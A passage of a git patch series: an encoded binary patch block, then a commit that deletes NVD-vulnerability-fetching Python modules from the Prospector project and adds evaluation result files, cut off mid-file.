zyz7!H2_@0oWIl@|ft$6F>dnfKN&?{1sy(xsMzJEg#xgSLDlN7k-;mn#S(CQ<z6#2OFKw(BE-1Vj|EBeX&r%^NJ7vo+0}h#Pju)!(n}C?ead}+>hjL@v&E-G6 zuz(z(Fh2yy+XDvfK4rm3;LUs~k)mvTn+xe4pp47J*)}#)h5Jnod>=uSFF70Gx)M=g zFU$?tV5?)?>sPEjobk$s39UM8`Izw$#%CrIC)CVLjO!ZJzVaPfT%NLdoU5BqmekFc zA+XIO5M~;DvcDLK5;DCsnA9B4T+tpQOMN8GL$ORbkScWDkWJTOG1d|GZb4Of+HMgH zpdd;k=uKPlw4lA#NDUi)YGP_B*#K4$NKJS;JmvaGcnW!J^p>*mUO$oW4`VFLJh&Ln z`Nl)t^+vA`@2GYjl-{8X>Js6!^n*vdxbt!Wkx>WlPF>*QTP? z^wJ#Pbqi3^m`+DbkV}%Xe1o z(Y6s=5B3XE8vH;GR7e$s%D_Wk!Jq|3?(0ysY|TYEop+m;Y%h=d;A5VoQ*EE$VM{kc zLK+VNxl!W!7$RlB(8{+E8J~f#EyP3k*%N#1*z(JQ?^dpb>~AJ7RV#jVU8p11?ZOf(?qg-fLJNCCRNoaF1<2FH zEM$cFD=>E}%JlXkeqIrF^?|5&+>R<$XA$7TDs^NbBrK38oR@%?N&begnv>5 z$so=@xBU$xXl0P|qTk6M-8XB;3opi}8f5y#9~~1_*|fm!?icN@YnYz3JNZ@R58R2b z1sIG~6>1+uA59m+9rD$}j6SPFdpsAHW`5D{?fY&1oN#b#9e~Uq0r73IVh6~mzNmXt zSN0Cjfn;wwblfnwr5jX0!g7}eWj-AxMIARLPJhsu5$*)PQ6&(5O$)KTiZ(1YR?wehQmrpgZeFErS zaG6ol(1uI%dEU94v*rU^D`j8CKho@Jrj9py_{QikAM#k?u1Y#g0P1o6X_LRR4ojiwDKme3TJK5$6ABFltpe4V7Vn0?OmGEl1Q&Z^UQD1+WJJO zC8<2<1%7Tx`8SWrR(GT`y!MdUyTapQR5C#rR|!={veGWOCpk|3p;ZBi-P7GWG4+S2 z;UCBC2YxZ~(%fduf6V)7F*X~SsorP;&#nBifKK+-45vI6qkqh!xG|cM;Uw1^9OP4y z{iL05$#~^p{W+@Lz4Gb{)U>@Fs7S25_@k+X`ro##&R};%2#uGmPgK7%j5yH5JU8T> zCUhW@f8_A~28uBJ1vvMjW=fAxVb)%1J2R$+FKo&Qafnz9m_@S7E5vE~Ym4d1%Pjw| z)=u_?+Dl9;o(NaDoKVZP+avz3yb^t!%FsG=6$4gKAmiXD(Q?GmUkdnmUh@{9v) zAx%XAih|P_Xk%;AJEhKFN8DTq^?^)ffFiK>>v<(aQcNqvQxC^Uf$0dol?VLy5>zj;lbdmyp0A7aSAC zw9TYg`^2r$Z7Gi6cordCpL;Onb2YcoeckhCu(jQ>N3cY7l|kc%>DH6lU~%4p#K}@@ zc8z(P*EtA7W@^Keh8GBF7(?5;E=JvZIHfn7vGHlrDpFT;@Q?hB2# zc5bAWglLzpVViDTD-xd_W~5MUq>+Z8)ddHH>T8b|f`x9eChacCvxCik81!8-(Z_Tu z;F#zyhliJ8%67;~qh8{rhR%I@h&PfkpQ#cXwi-?v>+l5pPCSC#IGnA&X;E5mba%;E>Fi zBfILs82v&UIT9|f*~X+AqNtwQzVvk9h9_0)e4Av=5fnFrzGmecLHG$fph|CDY2iVt zDZ>w`3uj^YUNaYpv08heM?OnhK@mjKK{5G5O|8lCckc}HPlJexhiPKA44RzQiN>4# zNb+9{Af+e$d)V#W3f}pOgb6i=oOY>c2r3*s!4WH0GIZ9*Z=?Ru_72%9Fw{(Wayt>Q zRr^2L!sQKhvdWve>U34D|8OAL~3JMgw>(&8q6GHE&$#J82+YzEU=ea)a5%Hvwo&U7X7`= z4c#Xow9`TFkBsllbp7Q*Q8=@IF@sd>W&RH=ah$0h+(Ja#*4ITrpiAfL0K=5~it)XR zr+G5t6k%%V!*|{4KYLN)&h;R7&hv!LsQ!ec*B-jg5MAJ}hF*lrl68+9nDhZQ=3a!$VZWAVV$>qUYCxzc!X0zBDavOtfqTKRD zh}yr>_Vqhv-jnSM-4ymQymt;U)2oWz;m3qIw)nBd_dC5&qN!GB8RM@JCkE^)u{my!@46H$ zejoj=YB(g+yQ>X`0mEV}jjol`v*n%cIba4cQBfb{Amnz1#ckhmBGE8)h_($t{io-W zd4|~MoWFOH7BdV=S2n^2q?Ar-nI~e6DSqOs*_VR27Zrm&tq+$XkdAumJUh7m%0&ZX z&R_h)PLH}8aa#cbFMqKUTd#}?aXTbr!FZ~31--0PU<;{_TKOmsvaFq3NPEK>_T*wm z{Q^e{rmQc-HlC^8qXi_Ag8l#>{-n0`t;$95qYjcZXmG~1?`%!+-hkS$ny-6y3{w3u zJvEOncC6u~g>xt~iQWS1#L#IwlBX)JHh3oaRI?#Df@Seq)y5J?(POxqd|v)u1d|EG z{G^*2uBfi7!n!114hvbG(KUH+@%t=K0<0R!rh+RXz!06@{@~yoM{wIm<~M80Of}H6 zEk=aV(6ARFWGmWGx3EP-j2W7n%oD>ve^epy*B3Fp)$5B+7a6D0)BEv;o@A@Y!ZZ`Q z!Q)j0_7THG{T6OZ!GW?AYGme4DZnC*v8EFcEl};q=yHE5zCI5s1l<@L+~m^@kI}&M z$#U-YdlGaGVozV~R#uw?8uogAr9ux9YYF~G%V@2jQ!|0FryIa0SIsi&g0_&+-gdZ} zgCdmt_x2H|PWCm{=wed!&+K%ND$_Uo7dD!e0t1HUSWcV?2kH}=+n9o*6f}0&&o85p zcpQQ|j{eFl1G6oicEmdfoZ-M9B`%T*e7ukZ4RBr6O_Ww0yY#Xcs(=a=YNH%;JY7*c zrSp%{C6P#%--Dscj%G?p&W2=#{~etTLbxvh%NrBe2)wiK032!N17jVb zUe{ed8aitBeCsfX#O>Xa%~=>C^LTQ`thcfNX-^nR4K=2vuw^zmVk#1Z406|EwdstBLt5ep$=P`L z@XJ^OgI;eR^machra|wj$T7`x8qyC?rjzLPPZsHpi8UV_iaBH8j+7-jMTdAO_i+60 zDVi_lJx!8O{dl4BU{U&?-)jTIJcXj8vAgo986WSwL-Rj9Pbd5&d%~HJw;z^sP*=eUW+aL$Ewd3GI0Eu6?#DWMTO^- zL&{G8(fytZYrne#? zH@etQ-9~fsvoyL!cBz4x#Btqr?-Xv!L<}*4rc`gNUhTl)PzCW5)q z{(LCAg<83B1)}F8^~60$V`!Fz_q-A2>>07KbSUX#S4r1@@m!*R+GIj%q<)cMb)pW3IaTqf>mHYZ>}6vvz@G`Jf3_8^-@G{2(?VAwi~_^1vnp79k;R( zc?_D&NYd3`Oj`7uGkghO9eKF`Gy)t%9?yuvti& z%?ekbRphBOIGQP+0h~qtyROj1+|JGKQ%^L~Q5DL0sADM3>dq?uz00afl@SaV<2~IL zqaO6pBH8f9Kguf%0Q@*aIXeNAH_zON%g#Ji<(@FRkpJxWTnqgY z8zrsobN^W9mOoL>ixZlBv;8chw)a{a{?-&@AWomr2zC!qcaby|{>35GcjRlw9LV{&P7= zSs_@)g*=e^4M~`gA?RL3%(I21)+DB5fz3j(JV*E*#Z`HlF@}qfyJsO2m!)kUanc1M z9Vw2!)YYp zZZ1{^TvG2*&ZM%`((obI*p3phYHf0xp8*cyBK-)e{C5A18XoWU;~A9=8CFj-Q*|8R z-Gh*L_m;3>7+!@zHi~wl+(e`f^1L3CF^0f7S{1>E{b@&{`ZZz4oa65}wVdY5qgjZ4 zR&3tD8rqKWns3xk5Eb^vay7b>SP6fYfXH<3gQG;{c97&KF=d3cN`3^03fTg_2PHEX zDv1{aKC3c{1iJYPJgOZ8&BcNE_Mb4=430vi=?c|gPCHcdA@Okj?B)a(gOP^G>qp+n ziS-5hnPFm#=kx>(7xQuD6bp_slK$BXx|tIKT-JiAv=z(o4$b0C{ z{L`EOJunpsoq6oY7Qv@r@`iSomoN*|+5OA+caR#i{%K}_L|1&9XV44$^C$So|9>wO zrVUP#q8n$28#jY#H1UEMuiz|4d@#EHKIA4#;dp^NQm}_drJ;4D*@adUj=3NW3 zRw^Kg7b-dknF(SA+P=(8lXH70MgLw#dMh580aQ~e@QL64#0*XUVTJbs!?#5mwH z%)0aqd)Q=z6pY!3Ck4HsZE*=}Yif5K%~yzr9XXgxxg(w_AwCXpGf!urxT{T>u5d>y zh+@#=tG6SHbsxi#>*Daj`*u(h#vcc;(7DTCm9m#@xa3o45HlNtZ!aawjkki~obdEa z%>MO+;82-aLo%0_Oq1aq_OFJvwk%;uXs+B$7-(MVL?i10Z_QAfD#sI5B6A8q>eXdF$1leny@IB?(i7pvUl z+g}{9I8f~iY%RT04_?b}4jR09GUjx+oJ zSP$@d-px-O4le(p$)d?hlkQq$y<%EEo6&RlEbaVs@lhOWefv46W)bZ^0wzL+GLNM& zC#x(%=M&?|2qaa$!=xu;Dq~#bFQk*@KVJS781%0#{~bw+d!0;&yyI2+x9jw9?W zYbYzjsp7SHc)azX-q0bV@ihC+kN9WT#jXU-p0N9mf3beZf*>%Z0eRPuBsZG2iO2Wl zSMK9S#)Z*Z!~awKrqT*S)f&@}JQOc~29M7B{f{5UTfk*Fi_U=?+R|M4FUPR)2ir}u zQY2}+-iAP+7;aaUkH^OM7z6&&3HiBcmL5g=mJ(#1@z)gv1uhf`mztdmhck`W^z>P% zeFEM#KxghfBCJ-&!0fr}ReMj-Ul46umY8+7O5^Kr@r1t%A#}YHm7Q`NX*J+(>Nv9BLmUEz&`OHu8p;=E4Kv~NJd|$GcyKH zuEzo9Q;Ih6%h`Qoh`4w6)3}BWO{|HxLJQ3cu@Lt+Z;wjZjN;NC&s~FFwN4r-O*u)X z_iB3Pk7{cLMrcWDZ+d|bLYDJ0ffwB8zh6N;@=`jZw{#qJMcyi1zlHvrWtuLnmtxT9 z7vGz}-|GwXly(r|c-eO4D#LXEBX=odv~NZB1j)0n;QNaEH!Jt)&{%_sTB zQY4ISE1Lr?o133X_RrVJgkz^(>#L6aK``tVIl(xR!jR}a1Tg6cYTZp|r2Gn8Aq`ow z!lDk%0!qZQ>x(23!!XRNe867{7Ud_5$A|KQSJAn>FHjpnJXw9t@#=JQ-Yv?XwYKZeS!)BYv=8S>1Vh<}HtugjF2s)eq*=Y2 zJYG@X**JqCjpD0r5{!3`ZM!|w$8xzAp*i412E%@M)3!`An}9RMXKYqTu%+$%3?CNV zrLUq>cq1mAafd8_u6}U4XFdZ5v%Md4Mom=L*)(RA+L!nhbIEax<{UM5OltXAYyYY2 z-P#ENHb$ieq@DE3rczB)b|4RwXH1rrDxf@$UEl64&2M#JOg7Z}a#KgJc_RA;5Ommy zB4tBSjvD*aO!5BpKTN@3+@`Cm!TY{*1+`;PtE%cL^TuVG*Y;uC>|2+jd;(wIQ(E)J z9NZHuuBKP`y#YfBQZwu+`GFz(#l9bNpAINpwJ#?pfyuYbFd&gzn42;z*51Y;(_GH+ zq%C1%PXm0O8R=2^EE?_2^8sr&kRYBv<^H<#7F~!HrB28sPvpWdD23HQecp{z-stPQ zmVSo_aab^rVWW)i!zzecw$H|kQ-j}lGrjw=MNhTRo}uNbI+kz^OL$5jH#rJ4Y?3kc zVXq#hJTRUO6bjR%WeHun1}xf>Nr!;7`@S2IO5I+=x;V##FC_8K^w0%2Ly6-nu`umc zI9(F#Gi3V~JK9}7y?&-_KBSn&`zvQ_Ht*{8iLO0^e4NI~j=5v^iRDpGsx*BdmCY`Z z(G`lf<>~;}Pu4W?>jFtX!)m_h(z{Mu?O=2^Efy!id$$P}mXK;Bp<> z&Z(-x$)3yQa}bLC^eabzB2tLQt8uh_yk3(m4w!Un8^p}1n5Qt;t`b*o`ugs7sU$y; z#BC+k#=U)L^b`uUrUb<_1q!5aQxWP@BJHPU_503BSW;nH9FeF++3C4$X3ZcHv57WS zpk$lyHqgZ9rY{XXi9?VfoA^Fk>h=qHRx{O3AWBz~r$qmS@|7Ksn2BMNf~ZR z;r$HOrfFHJXMDRtTUwOV*@p)jG$~_qFjEB0Q;5f_$B{FNB817*9x&OV5Sl*GHTi+D z;DBGvUhxYkR&@g_3G}%(-t;gIxh-o!!|fzLO~ynbtgE-S1IZnu0~3gZ{1H&|)w{Qy zWG9np6>+yBkgiSA7-=-_BEb;q}X-f2yBJdN7R|UleuF|baeO! zytJxbWQY_>O9vP0I`~bO62{e9H%?@=rjVsCxSf3{G@f-TR)R{w@13c{2L{U0j$A1~ zW6zgg#|gM;ghm4Jzw!kQ<%Dk>)h2RKcjzRjnNbu?fl9v1opOUvv#G%=9*O?7g?oM^ zlB8vNjx}FdZYnzm2V?Vl?g;Ccglfc?i{o}63i!ycu`}ZA9_zNg&q-Jmo7+GbjA~H| z{~6O?5nORnQ04lId>qV|brK~qF^JJ9Q>a!xNQrFwd=)&{=62hsiuiQ8Yp72Yh0ukK z{T3|AFH}WbYtHSMGxNoPskT^K8<6pIt3@j`GcyFSY5-qp4o~P2n)^rv=Vr-8z<$RN zqK4`jr##(=biASQ#~Z2IAIi*g>h^CH- zgV6@V%K55_mevD$1(c3p1>s~OOM#myoR?Quay02LC+)ZmRcUn2c52=rR2G*KnI2Fx zIvs2mxZhjGOn=tl#p7*d`!rx;Uy(96MC@L5{0P(3a`#i@c(TFMY-$Xr=l;^9)e4X^ z&HUVo z9LtET3O*GrN};?yh$JF0CM4XD2&)vQ=;lrp*?A4Vu<0DW!BK#&dJMKpg{4PLGZ4@A ze^0wAm%)6kvlYPI>x&SUtHk2KwAoi6Cx+6GS*F1i)3UWW%v@o}QtEh24UM_nxiIH` zUkTgJmLZ#EvUixo58DAn$Nw(=1_O9+Y-q>we)jg2kqWVSbzJ=gZ*{dM*B`r-DOIJP zmHPhrA;bPH*x5%_N0lGVq9}D_>kLP(+|zj1t)1%<+6T1_o$;BYRq8#3H{rGD zKh@p)JS&hwY~^xq>^Hf7S{hr^ou5U5@D4$BA>m=r_H#BPQ)#xUy1Znij=wbZotiWq zVeOnXY$#)uUdr7~)lS-Oao^LPZxx z6jiz!x@Og0V0*Zlf?F24mYxBc%*`VEA0hY>^KsC^v$rNcXpiM*6Gp6-7x3(}4XFm& zwZDS`xnPlRR2i4Xl8QVt(1)5-Q)j*-!D&ktBR6X~Rp%OQ>u4rSDvf=Y=57@FQ9ur# zHNxIlPB?UpeD+O@ExK#=boruW27I6Q7N`xLA38CS_gMKz1u`O2iX{&8*P(l)i2!uf zeeL{6M}d4dn%*73YCy)ou$G17E->X(bLTf2+7+Ih(DM#-#}IeXF_Q(jAsZYGQe82KyX#?>kb%>;tYPs zc{#xFZ;D|IZ!Q+dy7}9PeQg8K_b}#py0Q9mo8hOVE%smepih&=KUOU=TMKB--1|Yp zAQ$@Y42tPrcUAb%(c0BQ2VR$MFekhqfp6yjEw*l1UrO%7o2Ck_*&d(8{7HGHfS4M) z|LU9+2V<#-du;~qL{ZwD52R{D3GFyt8&|DZ-$ZVpa6wfHV=HnM1Ry$)o zydBN$O2!g?oD$7a5AETZB8{TQ22UM`S=WlbYc+5=56n@cd?97W^wEsEff~JgXzp3y zVjb;+nEQ@XSWQo<6i%s2*`C)aAm6c!9CHVRm`xyf`p$zB_Kk5Z zAn*0mcsgJ5O?SU{Z{t3c4w;)2NrL)g(1>x{10xP+`$LsE`lW2%LIk3`7*9*NkzoMA{8 z7LJnZg72XqZm}UFq>m2tHNQE=lv8Lag!d2KDYQmpHj}A{ALDW2kQ;L(bk5R1>M=zL z{+g~IiH^a`SI_MLQzExhjuM+BuoDBIz?|WIKj*d(h?f935hODo$%+fFIDwjCGL8n3 z@VHXmd~p0ZM*uSAGBO4cSMoevL0Rdq-jV!&Phq2)l6DkeBYe&R$p5?W^&lUwl&SjX zabzI3wZ*C&2TEZ0Sin97Sr0ErX!=uO^o@`g^=2o4rTM2m=>5MJ$Nx3EjQBsEg6b7F%|0D+!n6r1GXRR#Bfl`$u6y2oyGFrCUTUpN8UaMhG0GrQ0GWwY z0aGQtJeqD$-WL&rZgITM7Syv^k5d``wzL&8nL0k0#%Qu+gYwypKWUSd;=+veHIXb7 zTzIecWqrBb#2g*uM~;uOi$K46a~q(Z1X_&`oCxS`Fa4F}$Mz*Iw-^mFl802RX>9uB zC^30n@ZO!Yl{4+3P(+TBIn!g7pdN&El=%BZLvcFhiI~=xWn!JculcWwlD?TZ*?Rc&qllV~L%Gl}yW=)cgN7F0I zdc|d37@nTVQ02OnC5euBHS-7^vsP?Vf&MIlXqw%V#yp#m`5uRdr)1jw^<|@d+PH&* zGp7qD_xbf>D-SE0mlxNi)tR5?&bnxmN%fkZ!IT|0ad=-0_|`l_s)LfJXPfpgx+;^4 z#LLG( z`H1wT5>42l7!u3*We`r>k(zI7Oi<_p{_-6rzmjafR}y*OQL9ZCDbap(YrVumw6>3K z7k5~E5~gQ8jXDOcQQaMySij1%z$KUL4W7o_j#2Q<#lggn7UWAr)t2h(u-T>2nD(|* znd;)}EDCa}jx&s`B_CUop5@50eDY(ghqS3t_`WVX>|X?g9xe-+DEl!Glcf73fxWP> zCztm#GMgdg;lZe{EC+6p3hlVC?tb_6^Xkf6rL7W=V zvle3DN$)I7Y*Qz*_>oX)?ZWI8A}Su3TpI-i$L`G+*fA5M>z%E=j_u#k9(8V4GIiyb z)r!3%dAmiKTbejHLcO@>8k&U1r~`m@rH!4+6i45Tha8VC6g7X5^kYq376EK%?|HZc z4lg~`p3Wsmh2b$$ihRYA=}I1uf)0EPo|yq$SD6_KQ;_E+tG=pKkITioSkpp%jDz&# zNs-rb@7f!8wBC3yfGjK0l3!yB$88z3a9HwO)F^*_z!~uH_kiwM4BS6t2$ znANLF;|q_H5Y%!gdcv7sP_G5&cKmi(lJjt*a)tS@vHT39i-e@yW(d`y`(>k;oRHRm zM|eitq*>f$N-F%&YZVSrOeXJ@Gnd)Kp8n3de?b!do4EuwFr z+_Zs-`MaC|t5qHrvJh!ImWmJD?QPD4EK$C*W((Dn{vXOQfmd>i6<@&QXUZ&su(7fFkD5)}H+M=jhiTD)lMg{P-QgQ$nhg2tVg z=&5`kC^_j#BBkX{-mSYb`>3}*-I=Qmds?lIy{v_cWl(0+#_9pNzDT*>K@>e20Pb94 zEVTNoH$zSZ?(OBagc!`W8L1)|(hWv$n%tc8LZ4pIVs3gOa!D-rPBo=9^9ck50bSAT z(meueoA($~?J%p|LJT@DUo}r=(_v|aV(e!Hh9=`e(d&beOtHEW`wEc284MkouXx8N zQTQ+B9rPv!gCsm0(D5~14j5>{8KV~w_yESL>fWd^ZtNj9?!y>2D|j93*m1|t9gp$+ z9D5UG$$6zC`h24iW~s&U8fh#=4*1443MehVvXfr4FbMn!qId7^DG% zp%(aYZ_@tHNKS1JEKq1Pxs#Ii2ZSm-prT!7A>P0({g}Q z^XEc`^&fjd+ecQiwmV331>_DLQe@YAjwC$9UZX8=cD(NgAF1)peNKrTAnz{E8o`J( z=(pA!h^)qv1tJsTkHHfd->fpM%lhE=UX{L&&VI|b_|d_tm-rfu=ASWlvDZyRgN1p$ z<$c>*hAz%gz&B=*GQ4%_9B%}LF95c?QN+Lh)>tNvXY>9!1$E45>_+KpN*j3FTv%pO z%zn-C!l2A!JM(h>7qlOWhA!-v6Bt^VgCoBz6!?ADb3aKS3DY;8W-#Lm@HW(nGAY;cB zZ0u#Y6Ap*kZRTww@)=hlq{!R==6G z*_Ls;^RpMT%Fa%H2$OriU1Y7Cae|4XM!}8Iv;aqMa=8JgA(sS$Aq|2!&f{bf;Iu0Z>p#8I6-yNuO$H=|50m8Tv=ym2DQIUGNCg4gb7~=4J);~umld&$(!y_LP!TL!pvi-1lZ&y`orT| zJ50Gar1x}+7lR6iUa1K$#0EyMU=`~oZz)H8r1#Kj74Hg!e?cWze~gZo+HHIIJU5au zq20Xa z37%2Nc9tj6o|X>NP&SxKV>w_}ZgLtiic|YVOw3tIta=0H+K{AN8YwI;Q12Sz-p}TH65)qM%BD<52oYk&3nZ>T$V-}+E``rNUmO!kWMt2Q%owxjVxB6 z*(pxH_xQaMy^;}H^TpCieWqO*U0YRCc~$&|`@|FvgViNwCo_>rZ)EKuc~%%}cbueH z!X#g3DIi2^Ai^jtHg>K%xf3)J%oUau{1gH^qqwBc7icTw8S5F2-Y0x`UwFpqb9)Zg zzq&#>yM>A|I)y)KO~p1|E*O*aoicvfpJGqHg5QF5cby^l93^Gj_Zn)_T!Sm(knz2% z|3F(kHpS92VdUrij1hzm2k5QIsbYc$kWBY1GUq?9&?@lzaNWIc_9@?YsP#@vzH1x# zb7^R4@tSvkA*pkHsxrd&EgY2ae?~?_ku@(B4UtMa#N|v~9PZyP@EzjdIU%@wktgYZ z@mpz5>KRP|dtoOZ7|WrD!HJ7c7M1o$hwgxorAdTdp{2<#To4&WO*>fOO5ChTpkG5o zUWjwjH1TWRI?Apc1_n2}4`33;x|Ay==#yKpkSYx$!aVQws3b)9uSw!nZTWl$t)zDf zkA76R%*yF#h6{ktULgZ&k0x$Xy|H8zmuc;8kMB+N^|?qItfy`s%ZV(v1Vt#i{ZOBR zHGC)>TBCTdzfrQB*f`nJm%2iarPDqPGqEw5>b?5tzr_K%EpY4ZUr?4CfR)ZroRP`? zg}?oWmR1eZw<}np>$Ya&8Zjt0Rh2pOVlTe5H6tb?kIe3KA-`5nQos}!Ji$W#1h_gvItI>XBtq!U5C06-l^|*8faLX5G>Zr9*U)`Ylg{zpR}w$oK|NXxkTlJUv=si&W@p z>AS2@R#M9kPHXJU%LW?^0BD7jo;-}cZ@<6QNU(1s4$axvDEw;=uY z_B`0T*vQ*agmN+sjxtxI)>79RC>=`B5%ekCOAllFSR}~3$-i+{A_Pm*(fj#dn|A_plG=ef6R39l361C0W$~Ozxw-VHK1h2Bd9s61)gt# zj3e0}x_ezTDC%8P(CHpt6PNuLZqHnl!OX@KbLgA&;$`(Uq~60d^CUWhGFu}WEi8_} z`5+vd-h@of{#OE35jo+&|7)KPtjpwR)^ThMeR!9%vQmS&iYGaCnqaSY_@Q5`=Wf2m z(;?;JY^^Mw>@F-Jb+BQ<%bJhgl2iAz8#&cp-8j{*kndn@ZRWDq$9MnUwDEh_lf6qP zUQ?9@HrwYnK0bZSAo;iGQ=e|ezez;t%t1l8*~=t${OCiaV)#`m*B@spIh`Sy$sKlNZ59r+jMo>2E%RNLnDsP zkNo($a&Nivn@#GP^TU(|1(%_T!!M z^=9#g+Gihr*;t}?cWqz!{Ea%dceY;@oM*G*W9XlX>f6s<+A9LfURr;vtL=(kWxDkK zng}z$&p+$;%yI1Katuxbu9SN(DmF{~Kv>1m{V|U|>AS_eHed8^{rXFPdWHU$u6uU- z@wE+lSJwm{sZej%uKc#cKAhW=iCgiA{8W*cr Date: Fri, 30 Aug 2024 09:09:40 +0000 Subject: [PATCH 126/130] [FIX] after rebasing on pipeline branch --- .gitignore | 4 +- prospector/data_sources/nvd/filter_entries.py | 230 -- prospector/data_sources/nvd/job_creation.py | 145 - prospector/data_sources/nvd/nvd_test.py | 31 - prospector/evaluation/.gitignore | 4 - prospector/evaluation/analyse.py | 3 +- .../results/summary_execution_mvi_table.tex | 32 + .../summary_execution_mvi_with_llm.json | 2485 +++++++++++++++++ .../results/summary_execution_nvi_table.tex | 32 + prospector/evaluation/dispatch_jobs.py | 36 - prospector/evaluation/utils.py | 11 +- 11 files changed, 2558 insertions(+), 455 deletions(-) delete mode 100644 prospector/data_sources/nvd/filter_entries.py delete mode 100644 prospector/data_sources/nvd/job_creation.py delete mode 100644 prospector/data_sources/nvd/nvd_test.py delete mode 100644 prospector/evaluation/.gitignore create mode 100644 prospector/evaluation/data/results/summary_execution_mvi_table.tex create mode 100644 prospector/evaluation/data/results/summary_execution_mvi_with_llm.json create mode 100644 prospector/evaluation/data/results/summary_execution_nvi_table.tex diff --git a/.gitignore b/.gitignore index 75503a5f7..a32752152 100644 --- a/.gitignore +++ b/.gitignore @@ -62,6 +62,8 @@ prospector/test_report.json prospector/.idea/* prospector/*.html prospector/*.json -prospector/evaluation +prospector/evaluation/data/input/* +prospector/evaluation/data/reports/* +prospector/evaluation/config.yaml .DS_Store prospector/pipeline/reports/* diff --git a/prospector/data_sources/nvd/filter_entries.py b/prospector/data_sources/nvd/filter_entries.py deleted file mode 100644 index d34620f92..000000000 --- a/prospector/data_sources/nvd/filter_entries.py +++ /dev/null @@ -1,230 +0,0 @@ -import asyncio -import csv -import datetime -import json -from typing import Any, List - -Any, -import aiofiles -import aiohttp -import psycopg2 -import requests -from psycopg2.extensions import parse_dsn -from psycopg2.extras import DictCursor, DictRow, Json - -from backenddb.postgres import PostgresBackendDB -from data_sources.nvd.versions_extraction import ( - extract_version_range, - extract_version_ranges_cpe, - process_versions, -) -from datamodel.nlp import extract_products -from log.logger import logger -from util.config_parser import parse_config_file - -config = parse_config_file() - -# with open("./data/project_metadata.json", "r") as f: -# global match_list -# match_list = json.load(f) - - -def connect_to_db(): - db = PostgresBackendDB( - config.database.user, - config.database.password, - config.database.host, - config.database.port, - config.database.dbname, - ) - db.connect() - return db - - -def disconnect_from_database(db): - db.disconnect() - - -async def retrieve_vulns(past_days_range: int): - """Retrieve advisory data from the NVD. - - Params: - past_days_range (int): How many days in the past the time range of - retrieved CVEs starts. - - Returns: - The raw data from the NVD database. - """ - start_date, end_date = get_time_range(past_days_range) - - data = "" - # Set up the URL to retrieve the latest CVE entries from NVD - nvd_url = "https://services.nvd.nist.gov/rest/json/cves/2.0?" - - nvd_url += f"lastModStartDate={start_date}&lastModEndDate={end_date}" - - async with aiohttp.ClientSession() as session: - try: - async with session.get(nvd_url) as response: - if response.status == 200: - data = await response.json() - else: - print("Error while trying to retrieve entries") - except aiohttp.ClientError as e: - print(str(e)) - logger.error( - "Error while retrieving vulnerabilities from NVD", exc_info=True - ) - - return data - - -def save_vuln_to_db(vulns: List[Any]): - """Saves raw advisory data to the database for a list of advisories as - obtained from the NVD database.""" - db = connect_to_db() - for vuln in vulns["vulnerabilities"]: - vuln_id = vuln["cve"]["id"] - pub_date = vuln["cve"]["published"] - mod_date = vuln["cve"]["lastModified"] - raw_record = json.dumps(vuln) - source = "NVD" - url = ( - f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={vuln_id}" - ) - - res = db.lookup_vuln_id(vuln_id, mod_date) - if res[0] == 0: - print(f"Saving vuln: {vuln_id} in database") - db.save_vuln(vuln_id, pub_date, mod_date, raw_record, source, url) - db.disconnect() - - -async def get_cve_by_id(id): - nvd_url = f"https://services.nvd.nist.gov/rest/json/cves/2.0?cveID={id}" - - async with aiohttp.ClientSession() as session: - try: - async with session.get(nvd_url) as response: - if response.status == 200: - data = await response.json() - else: - print("Error while trying to retrieve entry") - except aiohttp.ClientError as e: - print(str(e)) - logger.error( - "Error while retrieving vulnerability from NVD", exc_info=True - ) - return data - - -async def add_single_cve(vuln_id: str): - raw_json_cve = get_cve_by_id(vuln_id) - save_vuln_to_db(raw_json_cve) - - -def write_list_to_file(lst, filename): - with open(filename, "w") as file: - for item in lst: - file.write(str(item) + "\n") - - -def csv_to_json(csv_file_path): - with open(csv_file_path, "r") as csv_file: - csv_reader = csv.reader(csv_file) - data = [] - # Skip the header row - next(csv_reader) - # Loop through the rows of the file - for row in csv_reader: - # Create a dictionary for the row data - row_data = { - "project": row[0], - "service_name": row[1], - "repository": row[2], - } - data.append(row_data) - # Convert to JSON object - json_data = json.dumps(data) - return json_data - - -def get_time_range(d_time): - # calculate the date to retrieve new entries (%Y-%m-%dT%H:%M:%S.%f%2B01:00) - date_now = datetime.datetime.now() - start_date = (date_now - datetime.timedelta(days=d_time)).strftime( - "%Y-%m-%dT%H:%M:%S" - ) - end_date = date_now.strftime("%Y-%m-%dT%H:%M:%S") - return start_date, end_date - - -async def process_entries(): - # start_date,end_date=get_time_range(d_time) - db = connect_to_db() - - # Retrieve unprocessed entries from the vulnerability table - unprocessed_vulns = db.get_unprocessed_vulns() - - # Process each entry - processed_vulns = [] - for unprocessed_vuln in unprocessed_vulns: - entry_id = unprocessed_vuln[0] - raw_record = unprocessed_vuln[1] - - processed_vuln = await map_entry(raw_record) - if processed_vuln is not None: - processed_vulns.append(processed_vuln) - db.save_processed_vuln( - entry_id, - processed_vuln["repo_url"], - processed_vuln["version_interval"], - ) - db.disconnect() - return processed_vulns - - -async def map_entry(vuln): - # TODO: improve mapping technique - async with aiofiles.open("./data/project_metadata.json", "r") as f: - match_list = json.loads(await f.read()) - - project_names = extract_products(vuln["cve"]["descriptions"][0]["value"]) - # print(project_names) - for project_name in project_names: - for data in match_list.values(): - keywords = [kw.lower() for kw in data["search keywords"]] - if project_name.lower() in keywords: - version = extract_version_range( - vuln["cve"], vuln["cve"]["descriptions"][0]["value"] - ) - filtered_vuln = { - "nvd_info": vuln, - "repo_url": data["git"], - "version_interval": version, - } - print(vuln["cve"]["id"]) - return filtered_vuln - - return None - - -# if no map is possible search project name using GitHub API -def retrieve_repository(project_name): - """ - Retrieve the GitHub repository URL for a given project name - """ - # GitHub API endpoint for searching repositories - url = "https://api.github.com/search/repositories" - - query_params = {"q": project_name, "sort": "stars", "order": "desc"} - - response = requests.get(url, params=query_params) - - if response.status_code == 200: - data = response.json() - if data["total_count"] > 0: - repository_url = data["items"][0]["html_url"] - return repository_url - - return None diff --git a/prospector/data_sources/nvd/job_creation.py b/prospector/data_sources/nvd/job_creation.py deleted file mode 100644 index f586e5230..000000000 --- a/prospector/data_sources/nvd/job_creation.py +++ /dev/null @@ -1,145 +0,0 @@ -import json -import sys -import time -from datetime import datetime - -import redis -import requests -from rq import Connection, Queue, get_current_job - -from backenddb.postgres import PostgresBackendDB -from core.prospector import prospector -from core.report import generate_report -from log.logger import logger -from util.config_parser import parse_config_file - -# get the redis server url and backend from configuration file -config = parse_config_file() -# redis_url = config.redis_url -# backend = config.backend -redis_url = "redis://localhost:6379/0" -backend = 